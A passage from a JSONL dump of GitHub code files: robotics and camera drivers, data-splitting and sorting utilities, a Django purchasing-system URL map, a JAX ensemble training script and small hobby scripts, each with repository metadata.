self.shape_nodes:\n t.loc = self.loc+ self.toGlob(t.p)\n \n def check_line_collision(self,start,end):\n num = 10\n X= np.linspace(start[0],end[0],num)\n Y = np.linspace(start[1],end[1],num)\n Z = np.linspace(start[2],end[2],num)\n for x,y,z in zip(X,Y,Z):\n if(z math.atan2(self.tips[i].p[1],self.tips[i].p[0]) > (2-i)*math.pi/3):\n print(\"CHECK FOOT ORDER\",i)\n self.printState()\n self.explode()\n tlogger.dist[\"foot_order\"] = tlogger.dist.get(\"foot_order\",0)+1\n # print(\"TLOGGER keys\",tlogger.dist.keys())\n break\n if(TIPS_distance):\n #相邻脚之间的角度差应该足够大\n orders = [0,1,2,5,4,3,0]\n for i in range(6):\n if(not (0.1 < (math.atan2(self.tips[orders[i+1]].p[1],self.tips[orders[i+1]].p[0]) \n - math.atan2(self.tips[orders[i]].p[1],self.tips[orders[i]].p[0]))%(math.pi*2) < 2)):\n print(\"CHECK FOOT DIStANCE \",i)\n tlogger.dist[\"foot_ang_distance\"] = tlogger.dist.get(\"foot_ang_distance\",0)+1\n # print(\"TLOGGER keys\",tlogger.dist.keys())\n self.printState()\n self.explode()\n break\n \n if(SAFE_ANGLE):\n ang = np.zeros(6)\n for i in range(0,6):\n ang[i] = math.atan2(self.tips[i].p[1],self.tips[i].p[0])\n deg = ave_ang(ang-basAng)\n if(abs(deg)>0.8):\n print(\"BODY TORCK\")\n self.printState()\n self.explode()\n\n if(FOOTRANGE):\n for i,t in enumerate(self.tips):\n if(not (FOOTRANGE[0] 15 * 1000:\n logger_main.debug(\"Motor run timeout\")\n on_released()\n # if web_server.is_web_server_thread_running():\n last_request, last_request_time = web_server.get_last_request()\n if last_request != \"\" and last_request_time != last_time:\n last_time = last_request_time\n logger_main.info(\"Last request\" + last_request)\n # else:\n # if not triggered_message:\n # log_message(\"Web server thread is not running.\")\n # triggered_message = True\n # # sys.exit()\n\nexcept KeyboardInterrupt as e:\n logger_main.exception(str(e))\n sys.exit()\n","repo_name":"pskyvader/pico_curtains","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31701070127","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport os\n\n\ndef k_fold_data(X, y, name, k):\n kf = KFold(n_splits=k)\n c = 0\n for train_index, test_index in kf.split(X):\n # print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n c += 1\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n # storing k_fold data on their dir\n save_k_fold_split([X_train, y_train], [X_test, y_test], name, str(c))\n\n\ndef save_k_fold_split(train, test, name, count):\n # now save data to csv file with iteration of k fold and dataset name\n # 1. Create folder name after name\n # 2. subfolder using name_k1\n # 3. inside name_kCount store csv file as name_k1_train, name_k2_train\n # raw folder contents pure file after k fold split on test and train\n # model contains doc2vec model\n # embedding contains inference vectors for both test and train\n root_folder = \"data/\"\n data_name_folder = root_folder + name + \"/\"\n k_data_name_folder = data_name_folder + \"k\" + count + \"/raw/\"\n raw_name_train = \"raw_\"+name + \"_k\" + count + \"_train.csv\"\n raw_name_test = \"raw_\"+name + \"_k\" + count + \"_test.csv\"\n\n if ensure_dir(k_data_name_folder):\n # create dataframe for test and train and save inside raw folder of each k fold\n train_df = pd.DataFrame(np.column_stack([train[0], train[1]]), \n columns=['text', 'label'])\n test_df = pd.DataFrame(np.column_stack([test[0], test[1]]), \n columns=['text', 'label'])\n # saving data frame\n train_df.to_csv(k_data_name_folder + raw_name_train, index=False)\n test_df.to_csv(k_data_name_folder + raw_name_test, index=False)\n\n print(\"Fle saved:\", name, count, raw_name_train, raw_name_test)\n\n\ndef ensure_dir(file_path):\n directory = os.path.dirname(file_path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n print(\"{} folder is created\".format(directory))\n return True\n else:\n print(\"{} folder is exists\".format(directory))\n return True\n\n\ndef split_data(data_list, k):\n # if single data use convert to list\n if not type(data_list) == list:\n data_list = data_list.split(\",\")\n # looping for every dataset\n for name in data_list:\n data_location = \"data/\"+name+\".csv\"\n\n if os.path.exists(data_location):\n df = pd.read_csv(data_location)\n X = np.array(df[df.columns[:-1]].values.tolist())\n y = np.array(df[df.columns[-1]].values.tolist())\n k_fold_data(X, y, name, k)\n else:\n print(\"{} file or path doesn't exists\".format(data_location))\n\n# use , to separate datasets but with out whitespaceor put in list\n# data = \"circle,3rd\"\n# split_data(data)","repo_name":"subashale/random_mvdt","sub_path":"prepare_features/kfold_data_split.py","file_name":"kfold_data_split.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23101842147","text":"\"\"\"\nshell sort\n\"\"\"\n\nfrom strategy import SortStrategy\n\nclass ShellSort(SortStrategy):\n def sort(self, elements):\n self.shellsort(elements)\n print('Shell sorted')\n\n def shellsort(self, array):\n \"Shell sort using Shell's (original) gap sequence: n/2, n/4, ..., 1.\"\n gap = len(array) // 2\n # loop over the gaps\n while gap > 0:\n # do the insertion sort\n for i in range(gap, len(array)):\n val = array[i]\n j = i\n while j >= gap and array[j - gap] > val:\n array[j] = array[j - gap]\n j -= gap\n array[j] = val\n gap //= 2\n","repo_name":"Sunhick/design-patterns","sub_path":"Behavioral/Strategy/shellsort.py","file_name":"shellsort.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22093880380","text":"\"\"\"\n导入随机数\n\"\"\"\nimport random\n\n\n\"\"\"\n玩家1 参数设置\n\"\"\"\n\np1_card_list = []\np1_A_num = 0\np1_non_A_point = 0\np1_point = 0\n\n# 玩家1手中第一张卡\np1_base_card1 = random.randint(1, 11)\nif p1_base_card1 == 11:\n p1_A_num += 1\n p1_card_list.append(\"A\")\nelse:\n p1_non_A_point += p1_base_card1\n p1_card_list.append(p1_base_card1)\n\n\n# 玩家1手中第二张卡\np1_base_card2 = random.randint(1, 11)\nif p1_base_card2 == 11:\n p1_A_num += 1\n p1_card_list.append(\"A\")\nelse:\n p1_non_A_point += p1_base_card2\n p1_card_list.append(p1_base_card2)\nprint(p1_card_list)\n\n\nprint(p1_non_A_point)\nprint(p1_A_num)\n\n\"\"\"\n玩家2 参数设置\n\"\"\"\n\np2_card_list = []\np2_A_num = 0\np2_non_A_point = 0\np2_point = 0\n\n# 玩家2手中第一张卡\np2_base_card1 = random.randint(1, 11)\nif p2_base_card1 == 11:\n p2_A_num += 1\n p2_card_list.append(\"A\")\nelse:\n p2_non_A_point += p2_base_card1\n p2_card_list.append(p2_base_card1)\n\n\n# 玩家2手中第二张卡\np2_base_card2 = random.randint(1, 11)\nif p2_base_card2 == 11:\n p2_A_num += 1\n p2_card_list.append(\"A\")\nelse:\n p2_non_A_point += p2_base_card2\n p2_card_list.append(p2_base_card2)\nprint(p2_card_list)\n\n\nprint(p2_non_A_point)\nprint(p2_A_num)\n\n\"\"\"\n玩家1判定和输入系统\n\"\"\"","repo_name":"TanWaiHong/Story","sub_path":"Project/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73651202385","text":"import sys\nimport pymysql\nimport datetime\n\ngame_name = \"\"\n\nfor word in sys.argv:\n game_name = game_name + word\n\ngame_name_list = game_name.split('/')\ngame_name = game_name_list[len(game_name_list)-1]\ngame_name_list = game_name.split('.')\ngame_name = game_name_list[0]\n\n#game_name = sys.argv[2]\nsystem_name = sys.argv[1]\nsystem_list = system_name.split('/')\ncurrent_time = str(datetime.datetime.now().time())\n\nsystem_name = str(system_list[5])\n\nprint('game_name:', game_name)\nprint('system_name:', system_name)\nprint('current_time:', current_time)\n\nhost = 'localhost'\ndatabase = 'RetroPie'\nuser = 'root'\n\n# connects to the database\nconn = pymysql.connect(host=host, user=user, db=database)\nif conn:\n print('Connection to MySQL database', database, 'was successful!')\n\nval = input('Enter')\n\ncursor = conn.cursor()\ncursor2 = conn.cursor()\n# mysql statement\ncurrent_game_sql = 'INSERT INTO CurrentGame VALUES (%s, %s, %s)'\n\nin_history_sql = 'SELECT game_name FROM GamesPlayed'\n\n# execution statement\ncursor.execute(current_game_sql, (game_name, system_name, current_time))\n\nconn.commit()\n\ncursor2.execute(in_history_sql)\nif game_name not in cursor2:\n game_history_sql = 'INSERT INTO GamesPlayed VALUES (%s, %s)'\n cursor.execute(game_history_sql, (game_name, system_name))\n conn.commit()\n\nprint('Bye!')\nconn.close()\n\n\n\n","repo_name":"stjpm09/retropie_flask_app","sub_path":"moveGameDataOnStartCopy.py","file_name":"moveGameDataOnStartCopy.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"841879640","text":"\"\"\"\nDefinition of urls for Purchasing_System.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url, include\nimport django.contrib.auth.views\nfrom django.contrib import admin\n\nimport app.forms\nimport app.views\n\nimport PurchaseRequisition.views\nimport RequestForQuotation.views\nimport Quotation.views\nimport PurchaseOrder.views\nimport DeliveryOrder.views\nimport Invoice.views\n\n# Uncomment the next lines to enable the admin:\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n # Examples:\n url(r'^$', app.views.home, name='home'),\n url(r'^contact$', app.views.contact, name='contact'),\n url(r'^about$', app.views.about, name='about'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'Log in',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^menu$', app.views.menu, name='menu'),\n\n #purchase requisition\n url(r'^purchaserequisitionform$', PurchaseRequisition.views.purchaserequisitionform, name=\"purchase_requisition_form\"),\n url(r'^purchaserequisitionconfirmation', PurchaseRequisition.views.purchaserequisitionconfirmation, name=\"confirm_purchase_requisition\"),\n url(r'^purchaserequisitiondetails', PurchaseRequisition.views.purchaserequisitiondetails, name=\"purchase_requisition_details\"),\n url(r'^purchaserequisitionhistorydetails', PurchaseRequisition.views.purchaserequisitionhistorydetails, name='purchase_requisition_history_details'),\n url(r'^purchaserequisitionhistory', PurchaseRequisition.views.purchaserequisitionhistory, name=\"purchase_requisition_history\"),\n\n #request for quotation\n url(r'^requestforquotationform$', RequestForQuotation.views.requestforquotationform, name=\"request_for_quotation_form\"),\n url(r'^fillingrequestforquotation', RequestForQuotation.views.fillingrequestforquotation, name=\"fill_request_for_quotation_form\"),\n url(r'^requestforquotationconfirmation', RequestForQuotation.views.requestforquotationconfirmation, name=\"confirm_request_for_quotation\"),\n url(r'^requestforquotationdetails', RequestForQuotation.views.requestforquotationdetails, name=\"request_for_quotation_details\"),\n url(r'^requestforquotationhistorydetails', RequestForQuotation.views.requestforquotationhistorydetails, name='request_for_quotation_history_details'),\n url(r'^requestforquotationhistory', RequestForQuotation.views.requestforquotationhistory, name=\"request_of_quotation_history\"),\n\n #quotation\n url(r'^quotationform$', Quotation.views.quotationform, name=\"quotation_form\"),\n url(r'^fillingquotation', Quotation.views.fillingquotation, name=\"fill_quotation_form\"),\n url(r'^quotationconfirmation', Quotation.views.quotationconfirmation, name=\"confirm_quotation\"),\n url(r'^quotationdetails', Quotation.views.quotationdetails, name=\"quotation_details\"),\n url(r'^quotationhistorydetails', Quotation.views.quotationhistorydetails, name='quotation_history_details'),\n url(r'^quotationhistory', Quotation.views.quotationhistory, name=\"quotation_history\"),\n\n #purchase order\n url(r'^purchaseorderform$', PurchaseOrder.views.purchaseorderform, name=\"purchase_order_form\"),\n url(r'^fillingpurchaseorder', PurchaseOrder.views.fillingpurchaseorder, name=\"fill_purchase_order_form\"),\n url(r'^purchaseorderconfirmation', PurchaseOrder.views.purchaseorderconfirmation, name=\"confirm_purchase_order\"),\n url(r'^purchaseorderdetails', PurchaseOrder.views.purchaseorderdetails, name=\"purchase_order_details\"),\n url(r'^purchaseorderhistorydetails', PurchaseOrder.views.purchaseorderhistorydetails, name='purchase_order_history_details'),\n url(r'^purchaseorderhistory', PurchaseOrder.views.purchaseorderhistory, name=\"purchase_order_history\"),\n\n #delivery order\n url(r'^deliveryorderform$', DeliveryOrder.views.deliveryorderform, name=\"delivery_order_form\"),\n url(r'^fillingdeliveryorder', DeliveryOrder.views.fillingdeliveryorder, name=\"fill_delivery_order_form\"),\n url(r'^deliveryorderconfirmation', DeliveryOrder.views.deliveryorderconfirmation, name=\"confirm_delivery_order\"),\n url(r'^deliveryorderdetails', DeliveryOrder.views.deliveryorderdetails, name=\"delivery_order_details\"),\n url(r'^deliveryorderhistorydetails', DeliveryOrder.views.deliveryorderhistorydetails, name='delivery_order_history_details'),\n url(r'^deliveryorderhistory', DeliveryOrder.views.deliveryorderhistory, name=\"delivery_order_history\"),\n\n #Invoice\n url(r'^invoiceform$', Invoice.views.invoiceform, name=\"invoiceform\"),\n url(r'^fillinginvoice', Invoice.views.fillinginvoice, name=\"fill_invoice_form\"),\n url(r'^invoiceconfirmation', Invoice.views.invoiceconfirmation, name=\"confirm_invoice\"),\n url(r'^invoicedetails', Invoice.views.invoicedetails, name=\"invoice_details\"),\n url(r'^invoicehistorydetails', Invoice.views.invoicehistorydetails, name='invoice_history_details'),\n url(r'^invoicehistory', Invoice.views.invoicehistory, name=\"invoice_history\"),\n]\n\nhandler404 = \"page_not_found\"\n","repo_name":"MoHamEdy92/Group-08-Purchasing-System","sub_path":"Purchasing System/Purchasing_System/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21022265014","text":"try:\n import jax_pod_setup\nexcept ModuleNotFoundError:\n import os\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ''\n os.environ[\"XLA_FLAGS\"] = '--xla_force_host_platform_device_count=8'\n\nimport jax\nimport util as u\nimport sys\nimport optax\nfrom tqdm import tqdm\nfrom jax.tree_util import tree_map, tree_multimap\nimport jax.numpy as jnp\nfrom jax.lax import psum\nfrom jax import vmap, value_and_grad, pmap, jit\nimport models\nimport data\nimport pickle\nimport wandb\nimport logging\n\n\ndef softmax_cross_entropy(logits, labels):\n one_hot = jax.nn.one_hot(\n labels, logits.shape[-1])\n return -jnp.sum(jax.nn.log_softmax(logits) * one_hot, axis=-1)\n\n\ndef train(opts):\n\n run = u.DTS()\n logging.info(\"starting run %s\", run)\n\n # # init w & b\n wandb_enabled = opts.group is not None\n if wandb_enabled and u.primary_host():\n wandb.init(project='ensemble_net', group=opts.group, name=run,\n reinit=True)\n # save group again explicitly to work around sync bug that drops\n # group when 'wandb off'\n wandb.config.group = opts.group\n wandb.config.seed = opts.seed\n wandb.config.max_conv_size = opts.max_conv_size\n wandb.config.dense_kernel_size = opts.dense_kernel_size\n wandb.config.models_per_device = opts.models_per_device\n wandb.config.learning_rate = opts.learning_rate\n wandb.config.batch_size = opts.batch_size\n wandb.config.steps_per_batch = opts.steps_per_batch\n else:\n logging.info(\"not using wandb and/or not primary host\")\n\n logging.info(\"build_model\")\n model = models.build_model(opts)\n\n num_devices = len(jax.local_devices())\n num_models = num_devices * opts.models_per_device\n\n # we make two rngs; one that is distinct per host and one\n # that will be common across the pod\n host_rng = jax.random.PRNGKey(opts.seed ^ jax.host_id())\n pod_rng = jax.random.PRNGKey(opts.seed * 2) # o_O\n\n logging.info(\"init models\")\n keys = jax.random.split(host_rng, num_models)\n logging.debug(\"model keys %s\" % list(keys))\n representative_input = jnp.zeros((1, 64, 64, 3))\n params = vmap(lambda k: model.init(k, representative_input))(keys)\n\n logging.info(\"init optimisers\")\n opt = optax.adam(opts.learning_rate)\n opt_states = vmap(opt.init)(params)\n\n def reshape_for_devices_and_shard(p):\n return u.shard(u.reshape_leading_axis(p, (num_devices,\n opts.models_per_device)))\n\n logging.info(\"treemap reshape params\")\n params = tree_map(reshape_for_devices_and_shard, params)\n opt_states = tree_map(reshape_for_devices_and_shard, opt_states)\n\n # -----------------------------------\n # prepare loss / training functions\n\n def mean_ensemble_xent(params, x, y_true):\n logits = model.apply(params, x)\n logits = psum(logits, axis_name='device')\n return jnp.mean(softmax_cross_entropy(logits, y_true))\n\n def update(params, opt_state, sub_model_idx, x, y_true):\n # select the sub model & corresponding optimiser state to use\n sub_params = tree_map(lambda v: v[sub_model_idx], params)\n sub_opt_state = tree_map(lambda v: v[sub_model_idx], opt_state)\n # calculate loss and gradients; summing logits over all selected models\n losses, grads = value_and_grad(\n mean_ensemble_xent)(sub_params, x, y_true)\n # apply optimiser\n updates, sub_opt_state = opt.update(grads, sub_opt_state)\n sub_params = optax.apply_updates(sub_params, updates)\n\n # assign updated values back into params and optimiser state\n def update_sub_model(values, update_value):\n return jax.ops.index_update(values, sub_model_idx, update_value)\n params = tree_multimap(update_sub_model, params, sub_params)\n opt_state = tree_multimap(update_sub_model, opt_state, sub_opt_state)\n # return\n return params, opt_state, losses\n\n logging.info(\"compile pmap update\")\n p_update = pmap(update,\n in_axes=(0, 0, 0, 0, 0),\n axis_name='device')\n\n # -----------------------------------\n # prepare evaluation functions\n\n # plumb batch dimension for models_per_device\n all_models_apply = vmap(model.apply, in_axes=(0, None))\n # plumb batch dimension for num_devices\n all_models_apply = vmap(all_models_apply, in_axes=(0, None))\n\n def ensemble_logits(params, imgs):\n logits = all_models_apply(params, imgs)\n batch_size = logits.shape[-2] # since last batch may be smaller\n num_classes = 10\n logits = logits.reshape((-1, batch_size, num_classes)) # (M, B, 10)\n ensemble_logits = jnp.sum(logits, axis=0) # (B, 10)\n return ensemble_logits\n\n @jit\n def total_ensemble_xent_loss(params, x, y_true):\n y_pred_logits = ensemble_logits(params, x)\n return jnp.sum(softmax_cross_entropy(y_pred_logits, y_true))\n\n # --------------------------------\n # run training loop\n\n for epoch in range(opts.epochs):\n\n # train for one epoch\n logging.info(\"data.training_dataset: epoch %d\", epoch)\n\n total_training_loss = 0\n training_num_examples = 0\n\n # split out a new shuffle seed for this epoch common\n # across pod\n pod_rng, shuffle_seed = jax.random.split(pod_rng)\n\n # create dataset\n train_ds = data.training_dataset(batch_size=opts.batch_size,\n shuffle_seed=shuffle_seed[0],\n num_inputs=1,\n sample_data=opts.sample_data)\n\n for imgs, labels in train_ds:\n\n logging.debug(\"labels %s\" % labels)\n\n # replicate batch across M devices\n # (M, B, H, W, 3)\n imgs = u.replicate(imgs, replicas=num_devices)\n labels = u.replicate(labels, replicas=num_devices) # (M, B)\n\n # run across all the 4 rotations\n # for k in range(4):\n # rotated_imgs = rot90_imgs(imgs, k)\n\n # run some steps for this set, each with a different set of\n # dropout idxs\n for _ in range(opts.steps_per_batch):\n host_rng, dropout_key = jax.random.split(host_rng)\n logging.debug(\"dropout_key %s\" % dropout_key[0])\n sub_model_idxs = jax.random.randint(dropout_key, minval=0,\n maxval=opts.models_per_device,\n shape=(num_devices,))\n logging.debug(\"sub_model_idxs %s\" % sub_model_idxs)\n params, opt_states, losses = p_update(params, opt_states,\n sub_model_idxs,\n imgs, labels)\n logging.debug(\"losses %s\" % losses)\n\n total_training_loss += jnp.sum(losses)\n training_num_examples += len(losses)\n\n mean_training_loss = float(total_training_loss / training_num_examples)\n logging.info(\"mean training loss %f\", mean_training_loss)\n\n # post epoch stats collection and housekeeping on primary host only\n if u.primary_host():\n # checkpoint model\n ckpt_file = f\"saved_models/{run}/ckpt_{epoch:04d}\"\n u.ensure_dir_exists_for_file(ckpt_file)\n with open(ckpt_file, \"wb\") as f:\n pickle.dump(params, f)\n\n # run validation\n total_validation_loss = 0\n validation_num_examples = 0\n validation_data = data.validation_dataset(\n batch_size=opts.batch_size,\n sample_data=opts.sample_data)\n for imgs, labels in validation_data:\n total_validation_loss += total_ensemble_xent_loss(params, imgs,\n labels)\n validation_num_examples += len(labels)\n mean_validation_loss = float(\n total_validation_loss / validation_num_examples)\n logging.info(\"mean validation loss %f\", mean_validation_loss)\n\n if wandb_enabled:\n wandb.log({'training_loss': mean_training_loss}, step=epoch)\n wandb.log({'validation_loss': mean_validation_loss}, step=epoch)\n\n # close out wandb run\n if u.primary_host():\n if wandb_enabled:\n wandb.log({'final_validation_loss': mean_validation_loss},\n step=opts.epochs)\n wandb.join()\n else:\n logging.info(\"finished %s final validation_loss %f\" %\n (run, mean_validation_loss))\n # return validation loss to ax\n return mean_validation_loss\n else:\n return None\n\n\nif __name__ == '__main__':\n\n # import jax.profiler\n # server = jax.profiler.start_server(9999)\n # print(\"PROFILER STARTED\")\n # import time\n # for i in reversed(range(5)):\n # print(i)\n # time.sleep(1)\n\n import argparse\n import sys\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--group', type=str,\n help='w&b init group', default=None)\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--max-conv-size', type=int, default=256)\n parser.add_argument('--dense-kernel-size', type=int, default=32)\n parser.add_argument('--models-per-device', type=int, default=2)\n parser.add_argument('--learning-rate', type=float, default=1e-3)\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--steps-per-batch', type=int, default=4,\n help='how many steps to run, each with new random'\n ' dropout, per batch that is loaded')\n parser.add_argument('--epochs', type=int, default=2)\n parser.add_argument('--log-level', type=str, default='INFO')\n parser.add_argument('--sample-data', action='store_true',\n help='set for running test with small training data')\n opts = parser.parse_args()\n print(opts, file=sys.stderr)\n\n # set logging level\n numeric_level = getattr(logging, opts.log_level.upper(), None)\n if not isinstance(numeric_level, int):\n raise ValueError('Invalid log level: %s' % opts.log_level)\n logging.basicConfig(format='%(asctime)s %(message)s')\n logging.getLogger().setLevel(numeric_level) # logging.INFO)\n\n train(opts)\n","repo_name":"matpalm/ensemble_net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10595,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"24968145464","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport ctypes\nimport struct\n\nfrom ioctl_numbers import _IOR, _IOW\nfrom fcntl import ioctl\n\nSPI_IOC_MAGIC = ord(\"k\")\n\nSPI_IOC_RD_MODE = _IOR(SPI_IOC_MAGIC, 1, \"=B\")\nSPI_IOC_WR_MODE = _IOW(SPI_IOC_MAGIC, 1, \"=B\")\n\nSPI_IOC_RD_LSB_FIRST = _IOR(SPI_IOC_MAGIC, 2, \"=B\")\nSPI_IOC_WR_LSB_FIRST = _IOW(SPI_IOC_MAGIC, 2, \"=B\")\n\nSPI_IOC_RD_BITS_PER_WORD = _IOR(SPI_IOC_MAGIC, 3, \"=B\")\nSPI_IOC_WR_BITS_PER_WORD = _IOW(SPI_IOC_MAGIC, 3, \"=B\")\n\nSPI_IOC_RD_MAX_SPEED_HZ = _IOR(SPI_IOC_MAGIC, 4, \"=I\")\nSPI_IOC_WR_MAX_SPEED_HZ = _IOW(SPI_IOC_MAGIC, 4, \"=I\")\n\nclass Lepton(object):\n \"\"\"Communication class for FLIR Lepton module on SPI\n\n Args:\n spi_dev (str): Location of SPI device node. Default '/dev/spidev0.0'.\n \"\"\"\n\n ROWS = 60\n COLS = 80\n VOSPI_FRAME_SIZE = COLS + 2\n VOSPI_FRAME_SIZE_BYTES = VOSPI_FRAME_SIZE * 2\n MODE = 0\n BITS = 8\n SPEED = 18000000\n\n def __init__(self, spi_dev = \"/dev/spidev0.0\"):\n self.__spi_dev = spi_dev\n self.__txbuf = np.zeros(Lepton.VOSPI_FRAME_SIZE, dtype=np.uint16)\n\n # struct spi_ioc_transfer {\n # __u64 tx_buf;\n # __u64 rx_buf;\n # __u32 len;\n # __u32 speed_hz;\n # __u16 delay_usecs;\n # __u8 bits_per_word;\n # __u8 cs_change;\n # __u8 tx_nbits;\n # __u8 rx_nbits;\n # __u16 pad;\n # };\n self.__xmit_struct = struct.Struct(\"=QQIIHBBBBH\")\n self.__xmit_buf = ctypes.create_string_buffer(self.__xmit_struct.size)\n self.__msg = _IOW(SPI_IOC_MAGIC, 0, self.__xmit_struct.format)\n self.__capture_buf = np.zeros((60, 82, 1), dtype=np.uint16)\n\n def __enter__(self):\n self.__handle = open(self.__spi_dev, \"w+\")\n\n ioctl(self.__handle, SPI_IOC_RD_MODE, struct.pack(\"=B\", Lepton.MODE))\n ioctl(self.__handle, SPI_IOC_WR_MODE, struct.pack(\"=B\", Lepton.MODE))\n\n ioctl(self.__handle, SPI_IOC_RD_BITS_PER_WORD, struct.pack(\"=B\", Lepton.BITS))\n ioctl(self.__handle, SPI_IOC_WR_BITS_PER_WORD, struct.pack(\"=B\", Lepton.BITS))\n\n ioctl(self.__handle, SPI_IOC_RD_MAX_SPEED_HZ, struct.pack(\"=I\", Lepton.SPEED))\n ioctl(self.__handle, SPI_IOC_WR_MAX_SPEED_HZ, struct.pack(\"=I\", Lepton.SPEED))\n\n return self\n\n def __exit__(self, type, value, tb):\n self.__handle.close()\n\n def capture(self, data_buffer = None):\n \"\"\"Capture a frame of data.\n\n Captures 80x60 uint16 array of non-normalized (raw 12-bit) data. Returns that frame and a frame_id (which\n is currently just the sum of all pixels). The Lepton will return multiple, identical frames at a rate of up\n to ~27 Hz, with unique frames at only ~9 Hz, so the frame_id can help you from doing additional work\n processing duplicate frames.\n\n Args:\n data_buffer (numpy.ndarray): Optional. If specified, should be ``(60,80,1)`` with `dtype`=``numpy.uint16``.\n\n Returns:\n tuple consisting of (data_buffer, frame_id)\n \"\"\"\n\n if data_buffer is None:\n data_buffer = np.ndarray((Lepton.ROWS, Lepton.COLS, 1), dtype=np.uint16)\n elif data_buffer.ndim < 2 or data_buffer.shape[0] < Lepton.ROWS or data_buffer.shape[1] < Lepton.COLS or data_buffer.itemsize < 2:\n raise Exception(\"Provided input array not large enough\")\n\n rxs = self.__capture_buf.ctypes.data\n rxs_end = rxs + Lepton.ROWS * Lepton.VOSPI_FRAME_SIZE_BYTES\n txs = self.__txbuf.ctypes.data\n synced = False\n while rxs < rxs_end:\n self.__xmit_struct.pack_into(self.__xmit_buf, 0, txs, rxs, Lepton.VOSPI_FRAME_SIZE_BYTES, Lepton.SPEED, 0, Lepton.BITS, 0, Lepton.BITS, Lepton.BITS, 0)\n ioctl(self.__handle, self.__msg, self.__xmit_buf)\n if synced or self.__capture_buf[0,0] & 0x0f00 != 0x0f00:\n synced = True\n rxs += Lepton.VOSPI_FRAME_SIZE_BYTES\n\n data_buffer[0:Lepton.ROWS,0:Lepton.COLS] = self.__capture_buf[0:Lepton.ROWS,2:Lepton.VOSPI_FRAME_SIZE]\n data_buffer.byteswap(True)\n\n # TODO: turn on telemetry to get real frame id, sum on this array is fast enough though (< 500us)\n return data_buffer, data_buffer.sum()\n","repo_name":"uomphoenix/overwatch","sub_path":"pylepton/Lepton.py","file_name":"Lepton.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14446734936","text":"# -*- coding: utf-8 -*-\n\"\"\"Example of start HSessionPool and run multiple task async\nAuthor : Maajor\nEmail : info@ma-yidong.com\n\"\"\"\nimport logging\nimport asyncio\nimport pyhapi as ph\n\n@ph.HSessionTask\nasync def session_task(session : ph.HSession, index1, index2):\n print(\"execute {0} - {1}\".format(index1, index2))\n hda_asset = ph.HAsset(session, \"hda/save_cube.hda\")\n asset_node = hda_asset.instantiate(node_name=\"cube\")\n asset_node.set_param_value(\"filename\", \"{0}-{1}\".format(index1, index2))\n await asset_node.press_button_async(\"execute\", status_report_interval=0.1)\n\ndef main():\n \"\"\"Main\n \"\"\"\n logging.basicConfig(level=logging.INFO)\n\n session_pool = ph.HSessionManager.get_or_create_session_pool()\n \n for i in range(2):\n for j in range(2):\n session_pool.enqueue_task(session_task, i, j)\n \n # run all task by now and close\n session_pool.run_all_tasks()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maajor/pyhapi","sub_path":"examples/multisession_run.py","file_name":"multisession_run.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"20108178811","text":"import numpy as np\n\n\n\"\"\"\n#Values Name Description\n----------------------------------------------------------------------------\n 1 frame Frame within the sequence where the object appearers\n 1 track id Unique tracking id of this object within this sequence\n 1 type Describes the type of object: 'Car', 'Van', 'Truck',\n 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',\n 'Misc' or 'DontCare'\n 1 truncated Integer (0,1,2) indicating the level of truncation.\n Note that this is in contrast to the object detection\n benchmark where truncation is a float in [0,1].\n 1 occluded Integer (0,1,2,3) indicating occlusion state:\n 0 = fully visible, 1 = partly occluded\n 2 = largely occluded, 3 = unknown\n 1 alpha Observation angle of object, ranging [-pi..pi]\n 4 bbox 2D bounding box of object in the image (0-based index):\n contains left, top, right, bottom pixel coordinates\n 3 dimensions 3D object dimensions: height, width, length (in meters)\n 3 location 3D object location x,y,z in camera coordinates (in meters)\n 1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]\n 1 score Only for results: Float, indicating confidence in\n detection, needed for p/r curves, higher is 